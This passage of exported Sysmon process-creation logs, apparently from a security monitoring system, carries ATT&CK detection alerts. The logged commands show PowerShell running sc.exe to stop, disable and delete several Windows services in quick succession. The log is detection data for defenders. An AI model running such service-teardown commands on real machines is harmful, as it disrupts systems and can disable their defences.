\\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.556137300Z"",""eventRecordID"":""3129"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.552\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-00103fea2a00}\r\nProcessId: 1928\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.552"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-00103fea2a00}"",""processId"":""1928"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.150",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.443 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010d4e72a00} +ProcessId: 1520 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop sysmgt +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.446558200Z"",""eventRecordID"":""3126"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.443\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010d4e72a00}\r\nProcessId: 1520\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.443"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-0010d4e72a00}"",""processId"":""1520"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.082",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.417 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-00100ce72a00} +ProcessId: 8176 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config sysmgt Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config sysmgt Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.422584900Z"",""eventRecordID"":""3125"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.417\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-00100ce72a00}\r\nProcessId: 8176\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config sysmgt Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.417"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-00100ce72a00}"",""processId"":""8176"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config sysmgt Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.001",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.299 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010afe42a00} +ProcessId: 4672 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop CLR +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.312227100Z"",""eventRecordID"":""3123"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.299\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010afe42a00}\r\nProcessId: 4672\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.299"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-0010afe42a00}"",""processId"":""4672"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:52.925",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.234 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010fee02a00} +ProcessId: 8032 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.242388000Z"",""eventRecordID"":""3120"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.234\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-0010fee02a00}\r\nProcessId: 8032\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.234"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-0010fee02a00}"",""processId"":""8032"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:52.906",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.187 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-001092de2a00} +ProcessId: 1288 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete system +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.191950200Z"",""eventRecordID"":""3118"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.187\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-001092de2a00}\r\nProcessId: 1288\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:24.187"",""processGuid"":""{df9fc3d3-b3cc-5ecf-0000-001092de2a00}"",""processId"":""1288"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:52.843",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:24.169 +ProcessGuid: {df9fc3d3-b3cc-5ecf-0000-00106bdd2a00} +ProcessId: 7088 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop system +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:24.174203900Z"",""eventRecordID"":""3117"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:24.169\r\nProcessGuid: {df9fc3d3-b3cc-5ecf-0000-00106bdd2a00}\r\nProcessId: 7088\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 